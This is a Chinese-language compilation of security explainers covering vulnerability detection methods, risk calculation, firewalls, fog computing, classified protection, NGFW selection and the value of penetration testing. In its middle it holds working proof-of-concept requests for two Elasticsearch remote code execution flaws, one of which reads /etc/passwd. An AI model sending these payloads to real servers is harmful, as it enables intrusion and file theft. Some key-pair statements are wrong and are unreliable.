漏洞檢測的方法有有三種，分別為：

• 直接測試(Test):直接測試是指利用漏洞特點發現系統漏洞的方法。要找出系統中的常見漏洞，最顯而易見的方法就是試圖滲透漏洞。滲透測試是指使用針對漏洞特點設計的腳本或者程序檢測漏洞。根據滲透方法的不同，可以將測試分為兩種不同的類型:可以直接觀察到的測試和只能間接觀察到的測試。

• 推斷(Inference):推斷是指不利用系統漏洞而判斷漏洞是否存在的方法。它并不直接滲透漏洞，只是間接地尋找漏洞存在的證據。采用推斷方法的檢測手段主要有版本檢查( VersionCheck)、程序行為分析、操作系統堆棧指紋分析和時序分析等。

• 帶憑證的測試(TestwithCredentials): 憑證是指訪問服務所需要的用戶名或者密碼，包括UNIX 的登錄權限和從網絡調用WindowsNT的API的能力。帶憑證的測試定義是:除了目標主機IP地址以外，直接測試和推斷兩種方法都不需要其他任何信息。

網絡安全風險計算包括以下內容：

1. 對資產進行識別，并對資產的價值進行賦值。

2. 根據資產價值的評判標準，評估出重要信息資產。

3. 對重要信息資產面臨的威脅進行識別，描述威脅的屬性，并對威脅出現的頻率賦值。

4. 對重要信息資產的脆弱性進行識別，并對具體資產脆弱性的嚴重程度賦值。

5. 根據威脅及威脅利用脆弱性的難易程度判斷安全事件發生的可能性。

6. 根據脆弱性的嚴重程度及安全事件所作用資產的價值計算安全事件的損失。

7. 根據安全事件發生的可能性及安全事件的損失，計算安全事件一旦發生對組織的影響，即風險值。

ElasticSearch遠程命令執行(CVE-2014-3120)

漏洞介紹：

ElasticSearch有腳本執行(scripting)的功能，可以很方便地對查詢出來的數據再加工處理。ElasticSearch用的腳本引擎是MVEL，這個引擎沒有做任何的防護，或者沙盒包裝，所以直接可以執行任意代碼。

而在ElasticSearch 1.2之前的版本中，默認配置是打開動態腳本功能的，如果用戶沒有更改默認配置文件，攻擊者可以直接通過http請求執行任意代碼。

測試POC：

http://127.0.0.1:9200/_search?source=%7B%22size%22%3A1%2C%22query%22%3A%7B%22filtered%22%3A%7B%22query%22%3A%7B%22match_all%22%3A%7B%7D%7D%7D%7D%2C%22script_fields%22%3A%7B%22%2Fetc%2Fhosts%22%3A%7B%22script%22%3A%22import%20java.util.*%3B%5Cnimport%20java.io.*%3B%5Cnnew%20Scanner(new%20File(%5C%22%2Fetc%2Fhosts%5C%22)).useDelimiter(%5C%22%5C%5C%5C%5CZ%5C%22).next()%3B%22%7D%2C%22%2Fetc%2Fpasswd%22%3A%7B%22script%22%3A%22import%20java.util.*%3B%5Cnimport%20java.io.*%3B%5Cnnew%20Scanner(new%20File(%5C%22%2Fetc%2Fpasswd%5C%22)).useDelimiter(%5C%22%5C%5C%5C%5CZ%5C%22).next()%3B%22%7D%7D%7D&callback=jQuery111107529820275958627_1400564696673&_=1400564696674

Elasticsearch Groovy任意命令執行漏洞

影響版本為1.3.0-1.3.7以及1.4.0-1.4。漏洞原因是elasticsearch使用groovy作為腳本語言，雖然加入了沙盒進行控制，危險的代碼會被攔截，但是由于沙盒限制的不嚴格，通過黑白名單來判斷，導致可以繞過，實現遠程代碼執行。

代碼格式如下：

POST http://127.0.0.1:9200/_search?pretty HTTP/1.1
User-Agent: es
Host: 127.0.0.1:9200
Content-Length: 132

{
"size":1,
    "script_fields": {
        "lupin": {
            "script": "java.lang.Math.class.forName(\“java.lang.Runtime\”)"
        }
    }
}

公私鑰是非對稱加密技術,公鑰和私鑰不同：

• 一個公鑰只對應一個私鑰，但是私鑰可以對應多個公鑰；

• 公鑰與私鑰是通過一種算法得到的一個密鑰對（即一個公鑰和一個私鑰），公鑰是密鑰對中公開的部分，私鑰則是非公開的部分；

• 私鑰的加密和解密一般使用的是相同密鑰所以傳輸過程中不可公開；

非對稱加密算法中，加密和解密分別使用不同的兩個密鑰。這兩個密鑰，我們稱之為公鑰和私鑰。

基于公開密鑰的加密過程如下：

基于公開密鑰的認證過程如下：

防火墻無論型號和品牌一般都會記錄以下日志信息：

• 數據包到達防火墻時間；

• 允許或攔截數據包信息；

• 通訊類型；

• 源ip地址信息；

• 源端口信息；

• 目標地址信息；

• 目標端口信息；

• 上網流量信息；

• 攻擊者信息；

• 當前占用網絡的活動程序。

安全霧計算的支撐技術有以下這些：

• 安全支撐技術：安全支撐技術的實現有許多不同的描述和屬性，比如隱私、匿名、完整性、信任、認證、驗證和評估，這些是霧計算參考架構的關鍵屬性。實現安全的執行環境的基本要素是需要用一種方法來發現、證明和驗證所有連接的智能“實物”的身份，然后才能建立信任。遵守霧計算參考架構的約束要求，就能確保部署的霧計算節點能構建一個安全的端到端的計算環境。這包括霧計算節點安全、霧計算網絡安全、霧計算管理和流程編排安全。這要求霧計算網絡搭建者、設計者高度聚焦安全和隱私問題，并在他們的項目應用、工程案例中采用特定類型的設備。

• 可擴展性支撐技術：可擴展性支撐技術解決物聯網工程動態部署的業務需求。彈性可伸縮涉及所有霧計算應用的垂直領域。霧計算的層次性及其在網絡邏輯邊緣的位置，使物聯網霧計算網絡參考架構增加了動態擴展的可能性。由于霧計算用例的可變性，在大型關鍵任務部署中，霧計算參考架構允許根據需求靈活伸縮、適度部署。

• 開放性支撐技術：開放性作為一個基本原則，使得霧節點可以存在于網絡或跨網絡的任何地方。這種開放性通過資源池化來實現，這意味著可以動態創建新的軟件定義的霧節點來解決業務需求。安全性支撐技術與開放性支撐技術有著共同的特征和要求。

• 自主性支撐技術：自主性（自治）支撐技術使霧計算節點能夠在面對外部服務故障時，繼續完成預先設計的功能。在霧計算體系結構中，整個層次結構都支持自治功能。決策處理活動將在部署層次結構的所有級別上進行，包括設備層或更高的層次。云中的集中決策不再是唯一的選擇。網絡邊緣的自治能力意味著來自本地設備或對等數據設備的智能，可以在最有商業意義的地方完成作業任務。

• 靈活性支撐技術：靈活性支撐技術解決了霧計算參考架構的業務部署和操作決策問題。僅靠人工是不可能分析、預測物聯網所產生的數據規模，靈活性支撐技術的重點是將這些數據轉換成可操作的決策，作為快速響應、健全業務、運營決策的基礎，靈活性設計技術滿足霧計算網絡部署的高度動態性，靈活性支撐技術適應霧計算網絡快速響應的變化需求。

• 可編程支撐技術：可編程支撐技術支持高度自適應部署，包括對軟件和硬件編程的支持。這意味著為了適應動態操作，應重新調度霧計算節點或霧計算節點集群，使它們完全自動化，應使用兼容通用的計算接口或加速器接口及霧計算節點固有的可編程接口，來完成重新分配任務。

網站等級保護是：

• 網站等級保護是指對國家重要信息、法人和其他組織及公民的專有信息以及公開信息和存儲、傳輸、處理這些信息的信息系統分等級實行安全保護，對信息系統中使用的信息安全產品實行按等級管理，對信息系統中發生的信息安全事件分等級響應、處置。根據信息系統等級保護相關標準，等級保護工作總共分五個階段。

根據信息系統等級保護相關標準，等級保護工作總共分五個階段，分別為：

• 信息系統定級。

• 信息系統備案。

• 系統安全建設。

• 信息系統開始等級測評。

• 主管單位定期開展監督檢查。

1、右擊選擇要加密的文件夾，選擇快捷菜單中的“屬性”；

2、選擇“常規”標簽中的最下方“屬性—高級”；

3、在“壓縮或加密屬性”一欄中，有兩項：

A、壓縮內容以便節約磁盤空間；

B、加密內容以便保護數據。把“加密內容以便保護數據”打上勾，點“確定”(如圖1)。

4、回到文件屬性點“應用”，彈出“確認屬性更改”窗口，選擇

A、僅將更改用于該文件夾；

B、將該應用用于該文件夾、子文件夾和文件。把B打上勾點“確定”(如圖2)。

要解開加密的文件夾，把圖1“加密內容以便保護數據”前面的勾去掉，點確定就可以了。

狀態防火墻處理包流程的主要步驟如下：

1. 接收到數據包，防火墻會接受傳來的數據包，將數據包發送到檢測數據包的模塊對數據包進行檢測。

2. 檢查數據包的有效性，若無效，則丟掉數據包并審計。如果數據包安全則傳輸到會話表進行比對，如果數據包是無效的或者說是帶有危險的則進行審查，審查后進行丟棄。

3. 查找會話表；若找到，則進一步檢查數據包的序列號和會話狀態，如有效，則進行地址轉換和路由，轉發該數據包；否則，丟掉數據包并審計。

4. 當會話表中沒有新到的數據包信息時，則查找策略表，如符合策略表，則增加會話條目到會話表中，并進行地址轉換和路由，轉發該數據包；否則，丟掉該數據包并審計。

評估方法如下：

• 檢查 Internet、Intranet和Extranet之間及它們內部各VLAN或區域之間邊界劃分是否合理；

• 檢查內網中的安全區域劃分和訪問控制是否合理，各vlan直接訪問控制是否嚴格；

• 檢查網絡系統現有的身份鑒別、路由器的訪問控制、防火墻的訪問控制、NAT等策略配置的安全性；

• 檢查防火墻是否劃分DMZ區域；

• 檢查是否配置登錄配置的安全參數；

• 檢查是否對應用層進行過濾；

• 是否設置禁止訪問 Java Applet、ActiveX等；

• 應用識別的能力

　　識別的廣度和深度是應用識別最重要的指標，也是下一代防火墻區別于傳統防火墻的重要特征。在應用識別廣度方面，業界領先的NGFW產品應用識別數量基本在3000以上。類似網康等專注于應用領域技術的廠商，目前應用識別數量應該都在4000以上。除了識別數量足夠廣之外，識別深度也更為重要。例如，企業可能會僅允許QQ聊天，但禁止QQ游戲；對跑在HTTP上的應用，能夠精準識別出該應用的具體用途；同時，能夠從逃逸，帶寬等多個維度去判斷應用屬性是否安全，比如限制P2P等流量耗費型且安全性不高的應用帶寬。同時，應用識別的結果還將提高后期智能聯動的防護效率，例如：SQL Server流量僅和SQL Server相關特定漏洞進行IPS防護，從而提升性能，降低誤報率。

• 功能與性能兼備

　　下一代防火墻融合IPS的防護，同時各廠家根據各自的理解還集成了其他更多的功能，但是有的廠商集成過多功能，甚至是集成Web應用防火墻這樣產品功能，嚴重導致NGFW性能下降，甚至出現死機現象。因此客戶在選擇產品時不能僅看到功能的全面性，卻忽視了開啟這些功能后的性能衰減。不然后期只能被迫禁用一些應用層防護的功能模塊，導致下一代防火墻變成了傳統防火墻或者UTM。業內權威機構認為，優秀的下一代防火墻產品開啟IPS功能后整機性能下降不應超過50%。

• 可視化（visibility）和智能分析能力

　　隨著網絡快速發展，各式各樣復雜威脅層出不窮，用戶需要更加及時的掌握網絡現狀、風險、威脅、事件以及防御效果等用于支撐安全決策。這就需要下一代防火墻具備良好的可視化和智能分析能力，幫助用戶看得清威脅，防得住攻擊。因此，真正的“可視化智能管理”應該是在多維統計的基礎上加以深入的分析，從應用和用戶視角多層面的將網絡應用的狀態展現出來。同時，通過引入外部威脅情報，實現安全態勢感知和風險預測功能，解決單機設備與生俱來的短板，以幫助用戶更加快速的了解網絡風險并及時部署防御措施。

超融合基礎安全架構能解決以下安全問題：

• 數據中心更新換代：數據中心因為設備淘汰需要進行更新換代，通過引入超融合架構可以讓組織得到更多優勢。

• 新的數據中心建設：在新的數據中心建設時采用HCI可以讓數據中心具備分布式、橫向擴展、自修復等技術特點。

• 空間與電力不足：數據中心在發展過程中可能會面臨空間和電力不足的問題，通過高密度的HCI可以使用更小的空間與電力來支撐應用。

• 性能瓶頸：使用三層架構的情況下，隨著業務的增長不可避免地遇到性能瓶頸，通過HCI的橫向擴展能力可以解決現有的性能問題并確保未來沒有性能瓶頸。

• 可用性困境：采用傳統三層架構的情況下，存儲設備通常存在單點故障，采用HCI后可以避免系統的單點故障，可接受一個或多個組件、節點、機箱的故障。

• 新應用上線：IT部門可以在新的應用上線時采用HCI，并可以結合HCI的特點進行應用架構的優化與調整，讓應用具備分布式、橫向擴展等特性。

• 災備數據中心建設：許多組織將災備數據中心建設加入IT建設議程，使用HCI建設災備中心不僅可以節省空間和成本，也能提高管理效率。

• 分支機構集中管理：無論是建設新的分支機構IT環境還是對現有的分支機構IT系統實現集中管控，使用HCI可以減少分支機構的IT管理維護成本。

• 合并與收購：在業務進行合并時，采用HCI可以快速實現業務整合以及系統部署、上線并支持集中管理。

• 快速上線應用：業務需要應用快速上線，不希望經過漫長的部署、測試周期，采用HCI可以加快應用的部署，讓應用具備快速上線的能力。

數據驅動的系統安全運行體系相關技術有以下這些：

• 資產管理關鍵技術：應以資產梳理為起點，逐漸完成資產畫像工作，更加清晰地掌握系統總體輪廓。資產采集技術分為主動感知與被動收集。主動感知可對所有在線設備進行網絡掃描和深入識別，獲取終端的網絡地址、系統指紋、資產指紋、開放端口和服務等，并根據積累和運營的指紋庫確定每個終端的類型、操作系統、廠商信息。被動收集通過采集資產間的流量數據，發現隱匿資產、孤島資產以及易被黑客攻擊的資產。

• 漏洞管理關鍵技術：應根據不同的生命周期狀態對漏洞的風險值進行修正，以最大程度地接近和還原用戶真實IT環境中的風險。采取結構化、標準化和組織化的方式來處理漏洞數據，能夠有效降低來自多源數據40%以上的數據量，同時根據漏洞具有的特征整合威脅情報并評估情報信息，解決宏觀分析的問題。

• 配置核查關鍵技術：建立豐富的配置核查知識庫、命令行庫，使其覆蓋市面上大部分設備，且支持自定義的核查項編寫，能根據特殊設備情況編寫適用的命令行，獲取設備配置信息。

• 補丁運營關鍵技術：在系統安全工程中，“補丁”概念屬于廣義范疇。廣義補丁的目標是通過合理化手段降低企業系統風險，提升系統的整體安全，并非千篇一律地使用“打補丁”方式，而是根據情況不同，酌情選擇使用虛擬補丁、訪問控制列表、身份驗證、資產下線等多種手段。

• 數據整合關鍵技術：應做好系統安全基礎數據的采集、發現、分析，從系統安全管理視角出發，最終將資產數據、資產與漏洞情報數據的關聯情況，以及資產存在的不安全配置項這類基礎數據，通過集中管控可視化平臺進行統一管理、展示，并根據已有的管理制度進行線上處置流程的協同配合與跟蹤反饋。

linux防火墻有65535個端口，因為防火墻的端口范圍是復合網絡標準的端口范圍，也就是說防火墻可以使用其中任意一個端口，但是在實際取值范圍中1023以下的端口已經分配給某些程序原因，所以實際使用中以1024開始往后使用。

在網絡技術中，端口(Port)大致有兩種意思：

• 物理意義上的端口，比如，ADSL Modem、集線器、交換機、路由器用于連接其他網絡設備的接口，如RJ-45端口、SC端口等等；

• 邏輯意義上的端口，一般是指TCP/IP協議中的端口，端口號的范圍從0到65535，比如用于瀏覽網頁服務的80端口，用于FTP服務的21端口等等。

提高業務連續性

業務連續性是任何成功組織的首要關注點。業務連續性中斷的原因有很多。缺乏安全漏洞就是其中之一。

與安全的系統相比，不安全的系統在可用性方面遭受更多的破壞。今天，攻擊者受雇于其他組織，通過利用漏洞獲得訪問權限并產生拒絕服務條件，這通常會使易受攻擊的服務崩潰并破壞服務器可用性，從而阻止業務的連續性。

保護客戶、合作伙伴和第三方

安全漏洞不僅會影響目標組織，還會影響與其相關的客戶、合作伙伴和與之合作的第三方。

但是，如果公司定期安排滲透測試并采取必要的安全措施，將有助于專業人員在組織中建立信任和信心。

有助于評估安全投資

滲透測試有助于了解當前的安全態勢，并有機會識別潛在的漏洞點。

滲透測試將為我們提供有關現有安全流程有效性的獨立視圖，確保正確遵循配置管理實踐。

這是審查當前安全投資效率的理想機會。哪些需要改進，哪些有效，哪些無效，以及需要多少投資才能在組織中構建更安全的環境。

幫助保護公共關系并維護貴公司的聲譽

經過多年的奮斗和努力，以及大量的投資，建立了良好的公共關系和公司聲譽。由于單個安全漏洞，這可能會突然改變。公眾對組織的觀點對安全問題非常敏感，可能會產生破壞性后果，可能需要數年時間才能修復。因此，如果定期進行適當的滲透測試，我們可以為總是試圖滲透并獲得任何組織訪問權限的未經授權的攻擊者創建一道堅固的墻。

防止財務損失

對安全系統的簡單破壞可能會造成數百萬美元的損失。滲透測試可以保護您的組織免受此類損害。

符合法規或安全認證

PCI DSS 解決了由合格滲透測試人員執行的相關系統的滲透測試。

ISO27001 標準中的合規性部分要求管理人員和系統所有者定期（每六個月后）由合格的測試人員進行安全審查和滲透測試。

有助于測試網絡防御能力

在滲透測試期間，目標公司的安全團隊應該能夠檢測到多種攻擊并及時做出相應的響應。此外，如果檢測到入侵，安全和取證團隊應開始調查，并應阻止滲透測試人員并刪除他們的工具。

您的 IDS、IPS 或 WAF 等保護設備的有效性也可以在滲透測試期間進行測試。許多攻擊應該被自動檢測到，應該生成警報，并且應該有專職人員按照公司的內部程序行事。

客戶端攻擊

滲透測試是確保成功針對您員工的關鍵成員進行的高度針對性的客戶端攻擊的有效方法。

在網絡犯罪分子發現之前發現漏洞！通過動手實驗和真實場景了解惡意黑帽黑客使用的技術。

應以整體方法處理安全問題。僅評估其服務器安全性的公司可能會面臨利用 Web 瀏覽器、pdf 閱讀器等軟件中的漏洞的客戶端攻擊的風險。確保補丁管理流程正常運行以更新操作系統和第三方應用程序。